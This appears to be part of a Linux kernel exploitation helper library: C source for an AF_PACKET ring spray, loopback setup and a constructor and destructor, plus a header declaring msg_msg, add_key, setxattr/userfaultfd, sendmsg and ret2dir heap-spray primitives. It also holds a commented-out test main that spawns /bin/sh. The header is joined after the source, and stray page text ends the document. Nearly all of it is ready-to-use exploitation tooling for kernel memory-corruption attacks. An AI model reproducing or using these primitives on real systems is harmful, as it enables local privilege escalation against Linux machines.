	if(s < 0) error_out("[pg_vec_spray] socket");

	struct tpacket_req req;
	req.tp_block_size = buf_size;
	req.tp_block_nr = num;// spray times
	req.tp_frame_size = buf_size;
	// one frame per block; using num directly avoids the 32-bit overflow
	// and the division by zero of (block_size * block_nr) / frame_size
	req.tp_frame_nr = num;
	int ret = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
	if(ret < 0) error_out("[pg_vec_spray] setsockopt");

	// destination: only the interface index and the hardware address
	// length are set, every other field stays zero
	struct sockaddr_ll sa;
	memset(&sa, 0, sizeof(sa));
	sa.sll_ifindex = if_nametoindex("lo");
	sa.sll_halen = ETH_ALEN;

	// stage the data in a populated private mapping
	void *addr = mmap(NULL, buf_size, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON|MAP_POPULATE, -1, 0);
	if(addr == MAP_FAILED) error_out("[pg_vec_spray] mmap");
	memcpy(addr, src_buf, buf_size);
	for(u32 i=0; i<num; i++) {
		ret = sendto(s, addr, buf_size, 0, (struct sockaddr *)&sa, sizeof(sa));
		if(ret < 0) error_out("[pg_vec_spray] sendto");
	}

	// the staging buffer is no longer needed once everything is sent
	munmap(addr, buf_size);
	return s;
}

/*
 * Bring the "lo" interface up so pg_vec_spray() can send through it.
 * Sets IFF_UP, IFF_LOOPBACK and IFF_RUNNING via SIOCSIFFLAGS.
 */
void setup_pg_vec()
{
	// bring up lo interface
	int fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_IP);
	if(fd < 0) error_out("[setup_pg_vec] socket");

	struct ifreq req;
	memset(&req, 0, sizeof(req));
	strcpy(req.ifr_name, "lo");
	req.ifr_flags = IFF_UP|IFF_LOOPBACK|IFF_RUNNING;
	int ret = ioctl(fd, SIOCSIFFLAGS, &req);
	if(ret != 0) error_out("[setup_pg_vec] ioctl");
	close(fd);
}

/*
 * Library constructor: runs before main().
 *
 * Disables stdio buffering, seeds rand(), loads the global tuning
 * parameters, allocates and fills idle_cpus, derives min_slice_tsc, builds
 * the CPU mask for CPUs 0..cpu_num-1 and opens /dev/urandom.
 * When built with STRESS it finally sleeps for one second.
 */
static void __attribute__((constructor)) init(void)
{
	// disable buffering
	setvbuf(stdin, NULL, _IONBF, 0);
	setvbuf(stdout, NULL, _IONBF, 0);

	// very bad random seed lol
	srand(time(NULL));

	// initialize parameters
	min_cpu_freq = _get_cpu_freq();// KHz
	min_granularity = _get_min_gran();// NS
	msgmnb = _read_u64_from_file(MSGMNB_FILE);// per-queue budget, divided by message size elsewhere (presumably bytes)
	cpu_num = _get_cpu_num();
	mem_size = _get_mem_size();
	optmem_max = _safe_read_u64_from_file(OPTMEM_MAX_FILE, 0x5000);
	idle_cpus = malloc(cpu_num*sizeof(*idle_cpus));
	// reload_cpu_info() writes into idle_cpus, so it must exist
	if(unlikely(!idle_cpus)) error_out("fail to allocate idle_cpus");
	reload_cpu_info();

	// calculate the minimal tsc in a minimal time slice:
	// (min_cpu_freq * 10^3) * (min_granularity / 10^9 ) = min_cpu_freq * min_granularity / (10 ^ 6)
	min_slice_tsc = (min_cpu_freq / 1000) * (min_granularity / 1000);

	// initialize cpu_mask
	CPU_ZERO(&cpu_mask);
	for(int i=0; i<cpu_num; i++) CPU_SET(i, &cpu_mask);

	// init urand_fd
	urand_fd = open("/dev/urandom", 0);
	if(unlikely(urand_fd < 0)) error_out("fail to open urandom");

#ifdef STRESS
	sleep(1);
#endif
}

/*
 * Library destructor: calls stress_all_caches() at program exit.
 * That call only does work when the file is built with STRESS defined.
 */
static void __attribute__((destructor)) fini(void)
{
	stress_all_caches();
}

//int main()
//{
//	printf("min_cpu_freq: %lldn", min_cpu_freq);
//	printf("min_granularity: %lldn", min_granularity);
//	printf("min_slice_tsc: %lldn", min_slice_tsc);
//	ts_fence();
//	set_cpu(1);
//	setup_sandbox();
//	system("/bin/sh");
//	while(1);
//}
/* Short names for the fixed-width integer types used throughout libexp. */
#define u32 unsigned int
#define u64 unsigned long long
#define i32 int
#define i64 long long

/* One entry of idle_cpus, filled in by reload_cpu_info(). */
struct cpu_info {
	int cpuid;      // index of the CPU section in the sched debug file
	int nr_running; // number parsed from the line following "cpu#"; sort key
};

/* Control block shared by the universal-spray worker threads. */
struct spray_struct {
    void *payload; // payload pointer as passed to prepare_univ_spray()
    size_t len;    // payload length; used as the setxattr value size
    u32 num;       // number of worker threads created
    int stage;     // 0 until univ_spray() sets it to 1; workers spin on it
};

/* One message queue used for spraying; nodes form a singly linked list. */
struct msg_spray_t {
	struct msg_spray_t *next; // next queue in the list, NULL at the end
	int msgqid;               // queue id used with msgrcv()/msgctl()
	void *payload;            // payload pointer (not dereferenced by msg_spray_clean)
	size_t len;               // message body length; receive size in msg_spray_clean
	u32 num;                  // number of receive attempts made in msg_spray_clean
};

/* Handles to the two counters that coordinate the sendmsg spray processes. */
struct sendmsg_spray_t {
	int *start_flag;     // set to 1 by sendmsg_spray(); helpers spin on it
	int *ready_proc_num; // start_flag + 1; incremented by each helper when ready
};

/* Branch-prediction hints: the condition is normalised to 0/1 with !! first. */
#define likely(x)      __builtin_expect(!!(x), 1) 
#define unlikely(x)    __builtin_expect(!!(x), 0)

/*
 * pid_t shim for the prototypes below.
 * #ifndef only detects a MACRO named pid_t, not a typedef. When no such
 * macro exists, pid_t is defined as int here and undefined again after the
 * prototypes (see LIBEXP_PID_T at the end of this section).
 */
#ifndef pid_t
#define pid_t int
#define LIBEXP_PID_T
#endif

/* utility helpers */
void error_out(const char *fmt, ...);
void rand_str(char *dest, size_t length);
int write_file(const char* fname, const char* fmt, ...);
void hex_print(void *addr, size_t len);
pid_t clean_fork(void);
void *umem_alloc(void *addr, size_t size);

/* CPU / scheduling / environment helpers */
void ts_fence(void);
void set_cpu(int);
void unset_cpu(void);
void reload_cpu_info(void);
void setup_sandbox(void);
void anti_swapper(void (*hook)(void));
void suppress_int(void (*hook)(void));

/* message-queue and add_key sprays, defragmentation, page-fault registration */
struct msg_spray_t * msg_spray(void *payload, size_t plen, u32 num);
struct msg_spray_t * msg_spray_max(void *payload, size_t plen);
void msg_spray_clean(struct msg_spray_t *);
void add_key_spray_num(void *payload, size_t size, u32 num);
void add_key_desc_spray_num(char *desc, u32 num);
void defragment(size_t size, u32 num);
void init_pagefault(void);
void *reg_pagefault(void *wanted, void *src_page, size_t len, void (*hook)(void *));
void nonsense(void);

/* universal (setxattr + userfaultfd) spray, ret2dir and sendmsg sprays */
void init_univ_spray(void);
struct spray_struct *prepare_univ_spray(void *payload, size_t len, u32 num, void (*hook)(void *));
void univ_spray(struct spray_struct *spray);
void stress_all_caches();
u64 heap_to_physmap(u64 heap_ptr);
void *ret2dir_setup(void *, u64);
struct sendmsg_spray_t *prepare_sendmsg_spray(u32, void *, size_t);
void sendmsg_spray(struct sendmsg_spray_t *);
void sendmsg_spray_transient(u32, void *, size_t);
void cleanup_msgs(void);

/* AF_PACKET ring spray */
int pg_vec_spray(void *src_buf, u32 buf_size, u32 num);
void setup_pg_vec();


/* drop the temporary pid_t macro again if this header introduced it */
#ifdef LIBEXP_PID_T
#undef pid_t
#endif

/* Globals shared with users of the library. */
extern u64 cpu_num;                   // CPU count, set by the library constructor
extern struct cpu_info *idle_cpus;    // cpu_num entries, refreshed by reload_cpu_info()
extern size_t kmalloc_size_array[13]; // cache sizes iterated by stress_all_caches()

Demo

?

Get in touch